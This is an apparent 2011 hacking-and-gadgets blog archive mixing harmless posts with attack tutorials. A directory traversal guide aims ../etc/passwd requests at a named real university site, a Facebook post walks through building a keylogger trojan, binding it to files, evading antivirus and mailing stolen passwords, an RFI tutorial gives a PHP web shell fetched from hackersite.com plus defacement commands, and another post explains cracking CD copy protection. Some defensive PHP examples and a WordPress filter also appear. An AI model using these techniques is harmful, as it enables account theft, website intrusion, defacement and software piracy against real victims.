Facebook account Hacked! What to Do Now?

March 24, 2011 at 8:33 am | Posted in Computer, computer and high technology, computer and technology, Hacking, news, Tips and Trick, Tutorial

It would be a nightmare for anyone whose Facebook account gets hacked, and he would wonder how to get his hacked Facebook account back. In this article I will tell you some methods through which you can regain your hacked Facebook account.

Steps to take when your Facebook account gets Hacked:

1. Reset your Facebook password with your secondary email address:
Whenever you sign up for a Facebook account, they ask for your secondary email address. If you lose your password, you can reset it with your secondary email address.

2. Secret answer:
Yes, you can also reset a Facebook password with the secret answer which you provided to Facebook while signing up for your account.

3. Contacting Facebook:
Lastly, if the hacker has changed your secondary email address and secret question, then you have only one way left, i.e. contacting the Facebook team about the issue.

Below I am also writing some ways to protect your Facebook account from getting hacked.

Protect your Facebook account from getting Hacked:

1. Use strong passwords:
To keep your Facebook account from being cracked with brute force, dictionary or rainbow table attacks, you need a strong password, usually more than 10 letters, or else it will be damn easy for a hacker to crack your Facebook password.

2. Use a phishing filter:
A phishing filter is a shield which protects you from fake login pages. These fake login pages are made to steal your passwords, and a phishing filter will prevent you from logging in to these kinds of pages.

3. Use a good antivirus and antispyware:
Yes, this is the most crucial step of all those mentioned above. It is highly recommended that you use a good antivirus and antispyware program. I would recommend Kaspersky as an antivirus and Spyware Cease as an antispyware, and don't forget to update them regularly. Remember, one trojan takes it all.

4. Use a good antilogger:
An antilogger is a program which lets you know if a keylogger is present on your computer. A keylogger is a spyware program which keeps track of what is happening on your computer.

5. Use a good firewall:
If you want to prevent a hacker from entering your computer and hacking your Facebook password, then you must use a good firewall. I personally recommend the ZoneAlarm firewall. A firewall is a hindrance to hacking: a hacker may bypass an antivirus, but it is very difficult for a hacker to bypass a firewall.

I hope these methods will help you to prevent your Facebook account from getting hacked. It is highly recommended that you follow all of the above methods to ensure maximum security.

 

Hack a website using Directory Traversal attack?

March 23, 2011 at 8:30 am | Posted in Computer, computer and high technology, computer and technology, Hacking, news, Tips and Trick, Tutorial

What is the root directory of a web server?

It is a specific directory on the server in which the web contents are placed and can be seen by website visitors. The directories other than the root may contain sensitive data which the administrator does not want visitors to see. Everything accessible by a visitor on a website is placed in the root directory. The visitor cannot step out of the root directory.

What does ../ or ..\ (dot dot slash) mean?

The ..\ instructs the system to go one directory up. For example, suppose we are at the location C:\xx\yy\zz. On typing ..\ , we would reach C:\xx\yy.

On typing ..\ again, we would reach C:\xx .

Let's go back to the location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is, to directory xx), where abc.txt is placed.

Note: It's ..\ on Windows and ../ on UNIX-like operating systems.

What is a Directory Traversal attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

The goal of this attack is to access sensitive files placed on the web server by stepping out of the root directory using dot dot slash.

The following example will make everything clear.

Visit this website vulnerable to directory traversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This web server is running on a UNIX-like operating system. There is a directory ‘etc’ on Unix/Linux which contains configuration files of programs that run on the system. Some of the files placed in the ‘etc’ directory are passwd, shadow, profile and sbin.

The file etc/passwd contains the login names of users and even passwords too.

Let's try to access this file on the web server by stepping out of the root directory. Carefully see the position of the directories placed on the web server.

We do not know the actual names and contents of the directories except ‘etc’, which is the default name, so I have marked them as A, B, C, E or whatever.

We are in directory F, accessing the web pages of the website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search for the directory ‘etc’ in F. But obviously there is nothing like this in F, so it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for ‘etc’ but again it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for ‘etc’ but again it will return nothing.

So by proceeding like this, we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to the ‘etc’ directory, and shows us the contents of the ‘passwd’ file.
To understand the contents of the ‘passwd’ file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile, etc/services and many other files, like backup files, which may contain sensitive data. Some files like etc/shadow may not be accessible because they are accessible only by privileged users.

Note: If proc/self/environ is accessible, you might upload a shell to the server, which is called Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user’s input
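
One way to carry out the second counter measure for a `page`-style parameter, shown as an added example that is not part of the original post or the site's code: canonicalise the requested path and serve it only if it still lies inside the page directory. The function name `resolve_page()`, the temporary directory layout and the sample requests are assumptions.

```php
<?php
declare(strict_types=1);

// Added example. resolve_page(), the directory layout and the sample requests
// are assumptions for illustration, not the code of the site discussed above.

/**
 * Return the canonical path of $requested if it is a regular file inside
 * $baseDir, otherwise null. Serve the result with readfile(), not include,
 * so that file contents are sent as bytes and never executed.
 */
function resolve_page(string $baseDir, string $requested): ?string
{
    // Refuse empty names and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../", "./" and symlinks, and returns false
    // when the target does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment check on the canonical path. The trailing separator stops
    // a sibling such as ".../pages-old" from matching the base ".../pages".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

/** Build a throwaway directory tree (constructed sample data) and test it. */
function run_demo(): array
{
    $root  = sys_get_temp_dir() . DIRECTORY_SEPARATOR
           . 'traversal_demo_' . bin2hex(random_bytes(4));
    $pages = $root . DIRECTORY_SEPARATOR . 'pages';
    $old   = $root . DIRECTORY_SEPARATOR . 'pages-old';
    mkdir($pages, 0700, true);
    mkdir($old, 0700, true);
    file_put_contents($pages . '/notification.php', "notification text\n");
    file_put_contents($old . '/draft.txt', "sibling directory\n");
    file_put_contents($root . '/secret.txt', "not for visitors\n");

    $requests = [
        'notification.php',            // the legitimate page
        './notification.php',          // same file after canonicalisation
        'etc/passwd',                  // does not exist under the base
        '../secret.txt',               // exists, but one level above the base
        '../pages-old/draft.txt',      // sibling that shares the name prefix
        '../../../../../etc/passwd',   // the request walked through above
        "notification.php\0.txt",      // NUL byte
    ];
    $results = [];
    foreach ($requests as $request) {
        $results[$request] = resolve_page($pages, $request) !== null;
    }

    // Remove the sample tree again.
    unlink($pages . '/notification.php');
    unlink($old . '/draft.txt');
    unlink($root . '/secret.txt');
    rmdir($pages);
    rmdir($old);
    rmdir($root);
    return $results;
}

foreach (run_demo() as $request => $served) {
    printf("%-36s %s\n", json_encode($request), $served ? 'served' : 'rejected');
}
```

Only the first two requests are served; every other request is rejected before any file is opened.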

 

CRACK CD PROTECTION

March 20, 2011 at 8:20 am | Posted in Computer, computer and high technology, computer and technology, Hacking, news, Tips and Trick, Tutorial

In this tutorial, we are going to learn how to crack CD protection, and how and where software and game companies save their products' passwords.
Want to know how hackers crack the CD protection of software and games and get the passwords out?
This process is very simple and it is just a four-step process.

Step 1:

This step will help you with the most basic system of protection, called C-Dilla, which is the most usual one…

Programs used:

A decompiler like Win32Dasm
Hiew (for editing files)

A decompiler is used to decompile the ExE files. The files we will work with are in ExE format, and we need a program that will HeX them (convert them to base 16, hexa, form) and locate the orders given in the code. Then we will find the line we need and change it to remove the protection with the second program: we need a program that will *edit* the files and fetch the right line number we got using the first program. All those actions are easily done w/ these programs:

Win32Dasm (the disassembler/decompiler program, added in the dir [root/Win32Dasm]) and Hiew (the editing program, added in the dir [root/Hiew]). The programs are added to the tutorial, in the dir [root/programs], because I'm not so sure you can find them at a stable location on the net.

Step 2: The Easy Protection.

Okay! To save you from reading this entire tutorial for nothing, I made this chapter, because there is a good chance you won't be needing the rest! Some games come w/ protection as files in the [/Setup] dir (or root dir) called [00000001.TMP], [CLCD16.DLL], [CLCD32.DLL] and, most important, [CLOKSPL.EXE]… If you see any of them, delete it and the protection should disappear (Important! Delete them after making a mirror of the game on your HD, using the info in the next chapter)… If you are still getting an error message, just keep on reading.

Step 3: Finding the right file and right error.

The file we are going to work w/ will be the main ExE of the game: you will find it on the CD, in a dir called [/Setup] or [/data], but the easy way to find it is just installing the game, and the ExE that starts the game will be the ExE we need! … Once you've got it, make some room on your HD, because we are going to copy the whole CD to it… Before you do that: some games have an option, when installing, to install the full game to the CD (but still needing it to play); use it if possible. The files you need to copy are all the game files; in some games that is the root dir of the CD, in others it is the [root/data] dir…

The worst case is when the game is inside a CAB file, and then you have to use a CAB extractor (WinZip 8 should do the job), and if it is protected, a different program that can compile CAB format (I'll try to put it in the tutorial as well). Once you've done all that, press the ExE, and if the game opens, close it and eject the CD, and then press again: you will get an error window! … Usually the line goes like “Error, please enter CD to run game” or “CD error” or “Error Reading CD-ROM”… Whatever error you get, write it down and remember it; we are about to look for it in the ExE code, and change it!

Step 4: Finding the right line number.

Open the first program, Win32Dasm, by unzipping it and clicking on [/w32dsm89.exe]. Now we have to load the file we know is the main ExE of the game, so click on “Disassembler” in the main menu, then “Open File to disassemble…” (Important! Make sure you have 50-100MB free on your HD before), then pick the file from the clone game dir you made on your HD (Important! Make a backup of the ExE)… After you've successfully w8ed while the program disassembled the file, you will see *a lot* of gibberish… don't worry! You don't have to understand what it says (I don't, and I'm not so sure ne1 does… except the programs of course)… (Important! If you can't read it and the font shows only numbers and bizarre letters, click on “Disassembler” in the main menu, then “Font…”, then “Select Font”, then pick Arial or something in English)… Now you have to find the exact line number, out of the 2 million in the file, that has the error message in it. Do that by clicking the “String Data references” button in the buttons menu (under the main menu), the second one from the right (your right)… Now you get a list of all the lines in the ExE that refer to actions, and you have narrowed the lines from 2 million to 2 thousand… To find the error message, click the first letter it started w/ (for example, if the message was “Error reading CD-ROM” click E), then search 'till you find the error line you are looking for! … Once you've found it… it will mark the title; pick the first line, and it should change color to green (that means the line can be edited and is important)… To be sure you have taken the right line: if there is a line like:

“:0044XBCK EB08 ….. (Lots of spaces) …. Jmp 0044EBD8” or:
“:0044XBCK EB08 ….. (Lots of spaces) …. Call 0044EBD8” or:
“:0044XBCK EB08 ….. (Lots of spaces) …. Push 0044EBD8”

you are at the right line. It says the command is a function, affected by the user, and probably the protection we are looking for (notice the words: Jmp = Jump, Call = Call, Push = Push)… Now that we've got the right line, we have to find its number! That is done by looking at the bottom of the program window, at the line that should look similar to this one: “Line:*** Pg *** of *** Code Data @:0045821 @Offset 00045821h in file:***.exe”. Notice the number that comes after the word “Offset” in this line: 00045821h, that is the line number! But notice the letter “h” at the end of it: you don't need it, so don't forget to remove it from the number. Now the only thing left to do is changing the line and removing the protection!

Step 5: Editing the line.

After writing down the line number you can minimize Win32Dasm, because for now we have finished using it. Open the second program: Hiew (added in the tutorial). This is an editor that works badly for searching for the right line, but will do if you know the line number and just wanna change it… Open again the same game ExE you have processed in Win32Dasm. When you enter you see a lot of gibberish; that's the code, and you need to change it to the decoded language… Do that by pressing the F4 key and then picking the option “Decode”… heh! A lot better now… Now press the F5 key to search for the right line. You will see that the line numbers at the left end of the screen are gray; enter the line number you got from Win32Dasm and it will jump you to the right location in the file… Now, this is the difficult part, not hard to do but hard to explain. Near the line number (just at the right) you will see the command in HeX form; it should be something like BC1BB3D2D1. That is in HeX code (base 16), which means a number (= byte) is represented by 2 letters/numbers, so that the group (BC1BB3D2D1) is made of 5 bytes: BC – 1B – B3 – D2 – D1 … (10 numbers = 5 bytes, 8 numbers = 4 bytes and so on…). We are about to change every byte, from D1 or BC, to 90. This is done by pressing the F3 key (activates the editing option) and typing, for every byte, the number 90 (90 is the noop number, that will disable the action)… and in our case, the command will change from BC1BB3D2D1 to 9090909090 … Once it is done, press the F10 key to save the offset, and exit.

Step 6: Testing

Now that you have an ExE w/out the error line, activate it from the same clone dir of the game you made, to test it. If it's working, congratulations! You have just cracked a CD protection! … If you are getting another error message, redo the same steps you have done w/ the first error message (in chapters 3-5) to change it as well (Important! Do it on the same ExE you have edited, and back up this one as well) and then test it again. You might need to do it several times, until you are getting no error message and the game runs!

Chapter VII: Quick order list.

- Start without the CD, then look at the error message and write it down.
- Search for the msg in the Win32Dasm references and copy the number w/out the H at the end!
- Open Hiew, F4 to Decode, F5 to search the line, and change the command: 90 for every 1 byte.
- F10 to save and then get out, don't forget to test!

Good Luck Cracking.

Hack Facebook Password using Facebook Hacking Software

March 1, 2011 at 3:00 am | Posted in Article, computer and high technology, Hacking, news, Tips and Trick, Tutorial

Hacking Facebook Account Password: Facebook Keylogging for Hacking Facebook

Every day I get emails wherein my readers ask me how to hack a Facebook account. You as the reader are most likely reading this because you want to hack into someone's Facebook account. So in this post I have decided to uncover the real and working way to hack any Facebook account. Actually there are many ways to hack someone's Facebook password, like phishing, keylogging or using hacking software made to hack Facebook passwords. In this post I'm going to show you how to hack someone's Facebook account password using a keylogger: Emissary Keylogger.

How to Hack Facebook Password using Keylogger?

1. First of all Download Emissary Keylogger It takes screenshots of the victim’s computer and sends it to your gmail along with the logs.

2. Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won’t work.

3. Extract the files using WinRar or any other zip/unzip program.

4. Open “Emissary.exe” to see something like this:

5. Now, fill in your Gmail username and password in the respective fields (you can create a Gmail account that you're going to use only for keylogging). Enter the email address where you wanna receive Facebook passwords. Choose a name for the server.exe file. You can set the timer as you wish. This timer controls the time interval between two log emails.

6. In the “Options” section you can see what this evil little buddy can do ;)

•Block AV Sites: Blocks VirusScanning Websites on victim’s computer

•Add to Startup: Adds to Startup via Registry

•Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark

•Disable TaskManager: Disable TaskManager on victim’s PC

•Disable Regedit: Disables Regedit on victim's PC

7. Check “Trojan Downloader” to download and execute a trojan on victim's PC. You can also create a fake error message and scare your victim, like:

8. After you’re done, hit on “Build” and you will get server keylogger file created in current directory.

9. Now, to hack facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.

10. Now because this is a server.exe file you can’t send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, Speedyshare, Ziddu.com, etc.

11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and send you email containing all user-ids and passwords, like:

Now you have all victim email passwords in your inbox and you can now hack victim facebook accounts easily. I have personally tested this free keylogger and found it working 100%. Enjoy Hacking.

Very Important: Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org/ and also check the “Do not distribute the sample” option.

Convert Movies for Ipad

February 28, 2011 at 2:39 am | Posted in Article, bussiness, computer and high technology, news

The iPad is one of the richest sources of entertainment in electronics these days, so learning how to convert movies for the iPad is a must. Movies have always been important and a high priority for most people. Nowadays it has become of paramount importance that converting movies for the iPad be learned and applied.

If you wish to watch a video on the tablet, it is better to convert it into the iPad format. As we all know, a tablet has its own size, its own specifications and so on. The output format could be a high definition (HD) format which is specific to the device.

In order to convert movies for the iPad, you need to use conversion software. The two programs you can use are X-users (for Mac OS) and iFunia Video Converter (also for Mac). These programs can give you an edge when it comes to file format conversion. Using them, or any other reliable format conversion software, you will be able to convert the file into the desired format and get the file onto your iPad. It seems easy enough! And in reality, it is.

For Windows users, there are many iPad video converters that are just as efficient as their Mac counterparts. For that reason, the software has become popular among tablet users. The iPad converters can convert the file into high resolution outputs, from 720p to 640×480, with variable compression effects and quality settings.

Other features of the more sophisticated file conversion software include conversion into MP3, AAC and WAV formats. Many of the newest programs include multimedia joining and splitting. Splitting into small chunks can also help.

Mac and Windows aside, Linux is not far behind in this business. There are some tools and programs designed for Linux as well. Since there is so much conversion software available for free on the web, it may not be a good idea to spend your money on format conversion software.

Format conversion software is a really handy way to convert your files for your iPad. The best thing you can do about your iPad software is to research the options and then decide which suits you best.

After all, it's not rocket science to convert your video to iPad format. These days the iPad and tablet computers have expanded so much in the market that it is absolutely paramount to have decent file format conversion software.

Another thing to look for in your iPad software is that it should be robust enough to handle the load of converting high-quality multimedia. Powerful software will in turn require powerful hardware, like extra RAM and a fast processor. But if you are looking for quality, then you need to be prepared to accept these requirements and act accordingly.

A simple tutorial Remote File Inclusion (RFI)

February 26, 2011 at 9:34 pm | Posted in Article, computer and high technology, Hacking, news, Tips and Trick, Tutorial

RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file to a website or server using a script. The vulnerability exploits poor validation checks in websites and can eventually lead to code execution on the server or code execution on the website (XSS attack using JavaScript). This time, I will be writing a simple tutorial on Remote File Inclusion, and by the end of the tutorial I suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that’s an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..

Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don’t have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script “evilscript” in text format from my website, which contains some code. Now, if it's a vulnerable website, then one of 3 cases happens:

•Case 1 – You might have noticed that the URL with “page=home” had no extension, but I have included an extension in my URL, hence the site may give an error like “failure to include evilscript.txt.txt”. This might happen because the site may be automatically adding the .txt extension to the pages stored on the server.

•Case 2 – In case it automatically appends something along the lines of .php, then we have to use a null byte “” in order to avoid the error.

•Case 3 – Successful execution :)

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

echo “”;

echo “Run command: “.htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);

?>

The above code allows you to exploit the include function and tests whether the site is RFI (XSS) vulnerable by running the alert box code, and if successful, you can send custom commands to the Linux server in bash. So… if you are in luck and it worked, let's try our hands at some Linux commands. For example, to find the current working directory of the server and then to list files, we will be using the “pwd” and “ls” commands.

http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is send the command as the cmd we put in our script, then print the working directory and list the documents. Even better, you can almost make the page proclaim that you hacked it by using the “echo” command..

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..

I leave the rest on your creativity..
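
From the defending side, the fix for the `include`-driven `page` parameter described in this post is to stop building the include target from request data at all. The following is an added example, not code from the original post: `PAGES`, `template_for()`, `handle()` and the template directory are assumptions, and the sample requests are constructed from the `page` values shown above.

```php
<?php
declare(strict_types=1);

// Added example. PAGES, template_for(), handle() and the template directory
// are assumptions for illustration; the sample requests are constructed.

// The only pages the site can render, mapped to local template files.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Map the request value to a template path, or null if it is unknown.
 * The value is only ever used as an array key, so it never becomes part of
 * a path or URL: schemes, "../" and appended extensions have nothing to act on.
 */
function template_for($page, string $templateDir): ?string
{
    // "?page[]=x" arrives as an array; anything that is not a string is refused.
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        return null;
    }
    return rtrim($templateDir, '/\\') . DIRECTORY_SEPARATOR . PAGES[$page];
}

/**
 * True when include/require are allowed to fetch URLs. The setting is off by
 * default; a deployment check can fail the release if it has been switched on.
 */
function url_include_enabled(): bool
{
    return (bool) filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

/** Decide the response for one query string: [status code, template or null]. */
function handle(array $query, string $templateDir): array
{
    $template = template_for($query['page'] ?? 'home', $templateDir);
    if ($template === null) {
        return [404, null];
    }
    // A real front controller would now run: require $template;
    return [200, $template];
}

// Constructed sample requests.
$samples = [
    ['page' => 'home'],
    [],                                                  // no parameter: default page
    ['page' => 'http://hackersite.com/evilscript.txt'],  // remote URL
    ['page' => 'home.txt'],                              // extension guessing
    ['page' => '../../etc/passwd'],                      // traversal
    ['page' => ['home']],                                // array instead of string
];

foreach ($samples as $query) {
    [$status, $template] = handle($query, '/srv/site/templates');
    printf(
        "%-52s -> %d %s\n",
        json_encode($query, JSON_UNESCAPED_SLASHES),
        $status,
        $template ?? '-'
    );
}
printf("allow_url_include enabled: %s\n", url_include_enabled() ? 'yes' : 'no');
```

Only `home` and the default request resolve to a template; every other value gets a 404 without reaching `require`.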

“WIP-Tools”

February 25, 2011 at 8:55 pm | Posted in Article, bussiness, computer and high technology, news

WIP-tools include pings, traceroutes and Reverse DNS. Pings can be performed simultaneously on all servers. This option for traces will be available soon. Use our monitoring servers to analyse the IP addresses and networks.

We have developed our own traceroute program. For a more accurate analysis, three protocols are used simultaneously: TCP (port 80), UDP and ICMP. It is the most practical option, because some routers do not respond to ICMP and others do not respond to UDP.

Visual display of the distance clearly shows the transitions between the hops. Moreover, you can see the AS path and the slow routers.

Examples of possible applications:

  • analyse the availability of your networks/servers all over the world;
  • test the paths and load on selected network segments;
  • choose the right hoster: how well it is located for your purposes;
  • test the honesty of your hoster/provider, to whom it is connected and what are its uplinks;
  • in case of unavailability of the server you can determine, whether the server or the channel of the provider is down and in what place;
  • all results are saved, you can share them with anyone through “Permanent link to these results”;
  • etc.

 

Basigi, a Locally Made Search Engine

February 19, 2011 at 2:06 am | Posted in Article, computer and high technology, news, Tips and Trick

Basigi is a name that sounds foreign, even to Indonesians. Looking for its equivalent in an Indonesian dictionary would probably be difficult. Instead, basigi is found in the Minangkabau language dictionary, where it means "to examine".

That may indeed be what it means when we visit this site, an Indonesian-style search site. It is still fairly new, so there are not yet many article sources to dig through here. Fortunately, they provide a place to submit URLs.

Basigi

Uniquely, on the front page, basigi provides a statistics link to show its users the most popular keywords here. There is also the most popular news as a complement. Even real-time news, which many other search engines now offer, is provided here, complete with related keywords and articles to make the most popular search patterns easier to follow.

Ads are also found on the search results page, something that usually appears on Google only for related words. Here, ads always appear even when no search results are found. At a glance, this page suggests that the site is aiming for a share of advertising revenue.

Who wants to try it?

Secure Your WordPress Against Attacks via URL

February 19, 2011 at 1:21 am | Posted in Article, computer and high technology, news, Tips and Trick, Tutorial

SQL injection, Remote File Inclusion, XSS and a host of other hacking attacks that exploit programming mistakes are quite effective at crippling many websites, especially dynamic ones. There is even a perception that free CMSs written in web programming languages such as PHP or ASP are very insecure and very vulnerable to attacks like these. Take Joomla, which has long been the favourite CMS to attack, and likewise WordPress, which is much the same as its neighbouring CMS. What is the cause? Mostly, as I mentioned, programming mistakes, whether unintentional or perhaps intentional on the developer's part? Yes, it might be intentional :). What is the result? Crackers, attackers, destroyers and defacers then exploit this to produce creativity that rather astonishes admins. Some might write a love letter to their sweetheart on the page of the website they attack, "Oh my dear, where are you, I miss you and long to meet…" :D, or perhaps other creativity that is, of course, vandalism, such as changing the admin username and password. Those are a handful of the consequences of attacks via URL, and they are quite fatal. A few years ago even the KPU, which clearly spent billions of the people's money on the security system for its database, could be hacked with nothing more than a browser. This is a lesson for other admins: never hold your head too high, because no system is 100% secure. Sorry, I forgot our main topic.

This article is specifically for those of you who use WordPress as the core of your website. Recently perishablepress.com made a plugin that can handle attacks via URL. At the very least it can protect your site from such attacks, although it is not 100% secure.

It is quite easy: download the file blockbadqueries.php.txt, rename it to blockbadqueries.php, then place it in your website's wp-content/plugins directory, and activate the plugin through your WordPress dashboard.

The file blockbadqueries.php contains …

<?php
/*
Plugin Name: Block Bad Queries
Plugin URI: http://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/
Description: Protect WordPress Against Malicious URL Requests
Author URI: http://perishablepress.com/
Author: Perishable Press
Version: 1.0
*/
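global $user_ID;
// The check only runs for logged-in users ...
if ($user_ID) {
    // ... who are not administrators (level_10).
    if (!current_user_can('level_10')) {
        // Reject over-long request URIs and URIs containing strings that are
        // typical of code-injection and SQL-injection attempts.
        if (strlen($_SERVER['REQUEST_URI']) > 255 ||
            strpos($_SERVER['REQUEST_URI'], "eval(") !== false ||
            strpos($_SERVER['REQUEST_URI'], "CONCAT") !== false ||
            strpos($_SERVER['REQUEST_URI'], "UNION+SELECT") !== false ||
            strpos($_SERVER['REQUEST_URI'], "base64") !== false) {
            // Answer with 414 and stop before WordPress handles the request.
            @header("HTTP/1.1 414 Request-URI Too Long");
            @header("Status: 414 Request-URI Too Long");
            @header("Connection: Close");
            @exit;
        }
    }
}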
?>

Source: http://www.wprecipes.com
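
The plugin compares the raw request URI against case-sensitive substrings. The following added example, which is not Perishable Press code, puts that test next to a variant that percent-decodes and case-folds the URI before matching, and runs both over constructed sample URIs; the function names `original_check()` and `normalised_check()` are assumptions.

```php
<?php
declare(strict_types=1);

// Added example. Function names and sample URIs are assumptions for
// illustration; this is not the plugin author's code.

/** The plugin's test as written: raw URI, case-sensitive substrings. */
function original_check(string $uri): bool
{
    if (strlen($uri) > 255) {
        return true;
    }
    foreach (['eval(', 'CONCAT', 'UNION+SELECT', 'base64'] as $needle) {
        if (strpos($uri, $needle) !== false) {
            return true;
        }
    }
    return false;
}

/** Same idea, but the URI is normalised before the substrings are compared. */
function normalised_check(string $uri, int $maxLen = 255): bool
{
    if (strlen($uri) > $maxLen) {
        return true;
    }
    // REQUEST_URI is not decoded by PHP. Decode percent-encoding until the
    // string stops changing (at most three rounds).
    $decoded = $uri;
    for ($i = 0; $i < 3; $i++) {
        $next = rawurldecode($decoded);
        if ($next === $decoded) {
            break;
        }
        $decoded = $next;
    }
    // "+" and whitespace both separate words in a query string; fold runs of
    // either into one space so "UNION+SELECT" and "union%20select" look alike.
    $flat = (string) preg_replace('/[\s+]+/', ' ', $decoded);

    foreach (['eval(', 'concat', 'union select', 'base64'] as $needle) {
        if (stripos($flat, $needle) !== false) {   // case-insensitive match
            return true;
        }
    }
    return false;
}

// Constructed sample request URIs.
$samples = [
    '/?s=wordpress+themes',
    '/?id=1+UNION+SELECT+1',
    '/?id=1%20union%20select%201',
    '/?f=Base64_decode',
    '/blog/how-to-concatenate-strings',
];

printf("%-36s %-9s %s\n", 'request URI', 'original', 'normalised');
foreach ($samples as $uri) {
    printf(
        "%-36s %-9s %s\n",
        $uri,
        original_check($uri) ? 'block' : 'pass',
        normalised_check($uri) ? 'block' : 'pass'
    );
}
```

The last sample shows the cost of substring matching: an ordinary slug containing "concat" is blocked once the match is case-insensitive, so a filter like this is a coarse extra layer in front of parameterised queries and input validation in the application, not a replacement for them.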

ViewSonic V350 Android Phone with Dual SIM and ViewPad 10Pro Win7/Froyo Slate Released

February 19, 2011 at 1:00 am | Posted in Article, bussiness, computer and high technology, news

A dual-SIM smartphone and a dual-boot tablet will be released in Barcelona next week. The ViewSonic V350 is a 3.5-inch HVGA Android 2.2 Froyo handset that can keep two SIMs active simultaneously, and it packs a 5-megapixel camera, WiFi, Bluetooth 2.1, A-GPS and a microSD card slot.

Meanwhile, the ViewSonic ViewPad 10Pro is a 10-inch, 1024 x 600 tablet with two operating systems that can boot into Windows 7 or Froyo. It has 3G, WiFi and Bluetooth connectivity and 6 hours of non-stop battery life.
